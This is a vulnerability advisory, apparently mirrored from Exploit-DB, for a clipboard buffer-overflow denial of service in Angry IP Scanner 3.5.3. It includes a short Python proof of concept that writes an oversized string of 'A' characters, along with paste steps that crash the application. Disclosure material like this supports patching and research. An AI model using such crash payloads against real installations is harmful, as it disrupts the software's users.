Vendor: Angry IP Scanner
By: Fernando Cruz
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 119
Product Name: Angry IP Scanner
Affected Version From: 3.5.3
Affected Version To: 3.11
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro, 64-bit
2018

Angry IP Scanner 3.5.3 Denial of Service (PoC)

A denial of service vulnerability exists in Angry IP Scanner 3.5.3 due to a buffer overflow when copying a large amount of data to the clipboard. An attacker can exploit this vulnerability by running a Python script that creates a file containing a large amount of data, copying that data to the clipboard, and then pasting it into the 'El valor no está disponible (sin resultados):' field in the 'Preferencias' tab of the 'Herramientas' toolbar. This causes the application to crash.

Mitigation:

Upgrade to the latest version of Angry IP Scanner.

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: cp1252 -*-
# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
# Author: Fernando Cruz
# Date: 13/12/2018
# Vendor Homepage: https://angryip.org
# Tested Version: 3.11
# Tested on Windows 10 Pro, 64-bit

# Steps to Produce the Crash:
# 1.- Run the Python code: python angryip.py
# 2.- Open angryip.txt and copy its content to the clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Herramientas" in the toolbar, click on "Preferencias", then open the tab "Mostrar"
# 5.- Paste the clipboard into "El valor no está disponible (sin resultados):" and click on "OK"
# 6.- Crashed

# 44455293 'A' characters (0x41), the oversized value pasted in step 5
buffer = "\x41" * 44455293

# Write the buffer to angryip.txt; the with-block closes the file
with open("angryip.txt", "w") as f:
    f.write(buffer)